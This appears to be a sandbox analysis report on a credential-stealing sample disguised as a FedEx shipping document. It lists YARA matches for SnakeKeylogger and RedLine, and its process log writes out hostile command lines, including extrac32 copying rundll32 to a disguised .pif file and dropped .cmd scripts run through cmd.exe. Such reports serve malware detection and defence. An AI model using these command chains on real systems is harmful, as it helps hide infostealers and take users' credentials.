        Source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000E.00000002.3936711785.000000002D540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 00000007.00000001.1451761141.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 00000007.00000002.3896174260.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: Process Memory Space: hzwdvhxM.pif PID: 7632, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: Process Memory Space: hzwdvhxM.pif PID: 8004, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: Process Memory Space: hzwdvhxM.pif PID: 8172, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, .csCryptographic APIs: 'TransformFinalBlock'
        Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, J-.csCryptographic APIs: 'TransformFinalBlock'
        Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, J-.csCryptographic APIs: 'TransformFinalBlock'
        Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, .csCryptographic APIs: 'TransformFinalBlock'
        Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, J-.csCryptographic APIs: 'TransformFinalBlock'
        Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, J-.csCryptographic APIs: 'TransformFinalBlock'
        Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, .csCryptographic APIs: 'TransformFinalBlock'
        Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, J-.csCryptographic APIs: 'TransformFinalBlock'
        Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, J-.csCryptographic APIs: 'TransformFinalBlock'
        Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, .csCryptographic APIs: 'TransformFinalBlock'
        Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, J-.csCryptographic APIs: 'TransformFinalBlock'
        Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, J-.csCryptographic APIs: 'TransformFinalBlock'
        Source: 7.2.hzwdvhxM.pif.2c440000.6.raw.unpack, .csBase64 encoded string: 'GA2I5CTKSEVWGV7K4DFKWQRELRMRX47DHDLY5YONNKJ2VGDOJSK54VYR'
        Source: 7.3.hzwdvhxM.pif.2792f7f8.0.raw.unpack, .csBase64 encoded string: 'GA2I5CTKSEVWGV7K4DFKWQRELRMRX47DHDLY5YONNKJ2VGDOJSK54VYR'
        Source: 7.2.hzwdvhxM.pif.29421216.3.raw.unpack, .csBase64 encoded string: 'GA2I5CTKSEVWGV7K4DFKWQRELRMRX47DHDLY5YONNKJ2VGDOJSK54VYR'
        Source: 7.2.hzwdvhxM.pif.2bdf0f20.4.raw.unpack, .csBase64 encoded string: 'GA2I5CTKSEVWGV7K4DFKWQRELRMRX47DHDLY5YONNKJ2VGDOJSK54VYR'
        Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpack, .csBase64 encoded string: 'GA2I5CTKSEVWGV7K4DFKWQRELRMRX47DHDLY5YONNKJ2VGDOJSK54VYR'
        Source: hzwdvhxM.pif, 00000007.00000003.1877236311.000000002E4F9000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000003.1875637119.000000002E4F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: M.slnt
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/11@3/3
        Source: C:\Users\Public\ndpha.pifCode function: 9_2_00593C66 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,9_2_00593C66
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D579B4 GetDiskFreeSpaceA,0_2_02D579B4
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,7_2_004019F0
        Source: C:\Users\Public\ndpha.pifCode function: 9_2_0059205A CoCreateInstance,9_2_0059205A
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,7_2_004019F0
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeFile created: C:\Users\Public\MxhvdwzhF.cmdJump to behavior
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCommand line argument: 08A7_2_00413780
        Source: C:\Users\Public\ndpha.pifCommand line argument: WLDP.DLL9_2_00594136
        Source: C:\Users\Public\ndpha.pifCommand line argument: localserver9_2_00594136
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: hzwdvhxM.pif, 00000007.00000003.1714043812.000000002A82D000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1856971438.0000000026D9C000.00000004.00000800.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1925955441.000000002B9DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeReversingLabs: Detection: 64%
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeVirustotal: Detection: 62%
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeFile read: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe "C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe"
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\MxhvdwzhF.cmd" "
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\\Mxhvdwzh46.cmd" "
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeProcess created: C:\Users\Public\Libraries\hzwdvhxM.pif C:\Users\Public\Libraries\hzwdvhxM.pif
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pif
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\ndpha.pif C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif
        Source: unknownProcess created: C:\Users\Public\Libraries\Mxhvdwzh.PIF "C:\Users\Public\Libraries\Mxhvdwzh.PIF"
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFProcess created: C:\Users\Public\Libraries\hzwdvhxM.pif C:\Users\Public\Libraries\hzwdvhxM.pif
        Source: unknownProcess created: C:\Users\Public\Libraries\Mxhvdwzh.PIF "C:\Users\Public\Libraries\Mxhvdwzh.PIF"
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFProcess created: C:\Users\Public\Libraries\hzwdvhxM.pif C:\Users\Public\Libraries\hzwdvhxM.pif
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\MxhvdwzhF.cmd" "Jump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\\Mxhvdwzh46.cmd" "Jump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeProcess created: C:\Users\Public\Libraries\hzwdvhxM.pif C:\Users\Public\Libraries\hzwdvhxM.pifJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pifJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\ndpha.pif C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif Jump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFProcess created: C:\Users\Public\Libraries\hzwdvhxM.pif C:\Users\Public\Libraries\hzwdvhxM.pifJump to behavior
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFProcess created: C:\Users\Public\Libraries\hzwdvhxM.pif C:\Users\Public\Libraries\hzwdvhxM.pif
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: url.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: am.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ieproxy.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ieproxy.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: ieproxy.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: mssip32.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: mssip32.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: mssip32.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: smartscreenps.dllJump to behavior
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeSection loaded: iphlpapi.dllJump to behavior
